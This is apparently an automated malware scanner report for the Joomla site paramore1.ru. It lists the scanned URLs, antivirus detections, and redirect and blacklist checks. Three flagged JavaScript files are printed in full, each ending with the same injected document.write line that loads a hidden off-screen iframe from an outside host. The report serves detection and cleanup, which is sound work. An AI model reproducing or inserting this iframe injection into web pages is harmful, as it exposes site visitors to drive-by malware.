
Malware Scanner report for paramore1.ru

Malicious/Suspicious/Total URLs checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/8
Deface / Content modification
OK


Scanned pages/files

Request | Server response | Status
http://paramore1.ru/
200 OK
Content-Length: 57323
Content-Type: text/html
clean
http://paramore1.ru/static/js/analytics.js
200 OK
Content-Length: 558
Content-Type: text/html
clean
http://paramore1.ru/static/js/function.file-get-contents
200 OK
Content-Length: 572
Content-Type: text/html
clean
http://paramore1.ru/test404page.js
404 Not Found
Content-Length: 545
Content-Type: text/html
clean
http://paramore1.ru/function.file-get-contents
404 Not Found
Content-Length: 545
Content-Type: text/html
clean
http://paramore1.ru/components/com_jcomments/js/jcomments-v2.1.js_v=2.html
200 OK
Content-Length: 27019
Content-Type: text/html
clean
http://paramore1.ru/components/com_jcomments/libraries/joomlatune/ajax.js
200 OK
Content-Length: 4178
Content-Type: application/javascript
clean
http://paramore1.ru/media/system/js/caption.js
200 OK
Content-Length: 2350
Content-Type: application/javascript
malicious
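Malicious code - confirmed by antivirus engines (see below). The flagged part is the final `document.write(...)` statement appended after the otherwise ordinary caption script: it inserts a 128x128 iframe positioned off-screen (left:-500px) that loads content from a third-party host. The same line is appended to all three flagged files.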

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 826 bytes are skipped ...
t:"+align);
if (!docMode|| docMode < 8) {
container.style.width = width + "px";
}
}
}
});
document.caption = null;
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});
;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>');

Antivirus reports:

Ikarus
Trojan.IframeRef
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
VIPRE
Malware.JS.Generic (JS)
Sophos
Mal/Iframe-AN

http://paramore1.ru/includes/js/overlib_mini.js
200 OK
Content-Length: 37030
Content-Type: application/javascript
clean
http://paramore1.ru/components/com_joomgallery/assets/js/joomscript.js
200 OK
Content-Length: 15387
Content-Type: application/javascript
clean
http://paramore1.ru/modules/mod_gk_tab/scripts/engine_compress.js
200 OK
Content-Length: 3186
Content-Type: application/javascript
malicious
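Malicious code - confirmed by antivirus engines (see below). The packed `eval(function(p,a,c,k,e,d)...)` wrapper appears to be the module's own compressed script (its word list contains the tab module's identifiers); the flagged part is the `document.write(...)` statement appended after it, which inserts an off-screen iframe.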

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('19.C("16",5(){$6(".T").g(5(2,i){9 W=2.18("1d");9 $G=$1e["T"+W];9 3=$G["S"];9 b=2.1c(\'.Q-\'+3);9 1f=($G["13"]==0)?11:X;9 4=0;9 U=($G["1i"]==0)?"R":"1h";9 d=b.1g;9 f=X
... 2208 bytes are skipped ...
ab_container2|true|else|autoAnimation|gk_tab_button_prev|gk_tab_button_next|domready|Scroll|getProperty|window|duration|styleType|getElementsBySelector|id|Gavick|animation|length|mouseenter|activator|new|height|wait|transition|gk1_tab_ul|animationType|return|Fx|addClass'.split('|'),0,{}))
;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

http://paramore1.ru/modules/mod_gk_tab/scripts/importer.php_modid=tabmix1_activator=click_animation=0_animationFun=Fx.Transitions.linear_animationType=1_animationSpeed=300_animationInterval=5000_styleType=0_styleSuffix=style1_fixedHeight=0_fixedHeightValue=200_alwaysHide=0.html
200 OK
Content-Length: 794
Content-Type: text/html
clean
http://paramore1.ru/modules/mod_gk_tab/scripts/function.file-get-contents
404 Not Found
Content-Length: 545
Content-Type: text/html
clean
http://paramore1.ru/modules/mod_gk_image_show/js/style3/engine.js
200 OK
Content-Length: 5429
Content-Type: application/javascript
clean
http://paramore1.ru/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js
200 OK
Content-Length: 4644
Content-Type: application/javascript
malicious
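Malicious code - confirmed by antivirus engines (see below). The flagged part is the `document.write(...)` statement appended after the closing `});` of the module script, which inserts an off-screen iframe.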

window.addEvent("load",function(){
$$('.gk_npro_mainwrap').each(function(el,i){
var TID = el.getProperty('id');
var main = $(TID);
var animation = false;
var $G = $Gavick[TID];
if($E('.gk_npro_full_interface', main) && $E('.gk_npro_full_scroll1', main)){
var offset = $E('.gk_npro_full_scroll1', main).getSize().size.x;
var scroller_main = new Fx.Scroll($E('.gk_npro_full_scroll1', main),{duration: $G['animation_speed'],wheelStops:false});
... 4094 bytes are skipped ...
actual_list_page == blocks_list.length - 1){
scroller_list.scrollTo(0, 0);
actual_list_page = 0;
}else{
actual_list_page++;
scroller_list.scrollTo(actual_list_page * offset_list, 0);
}
});
}
}
});
});;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: paramore1.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Apr 2014 19:53:49 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.3.28
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: paramore1.ru
Referer: http://www.google.com/search?q=paramore1.ru

Result:
The result is similar to the first query. No suspicious redirects were found for these two request variants (direct visit and search-engine referrer).

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=paramore1.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://paramore1.ru/

Result: paramore1.ru is not infected or malware details are not published yet.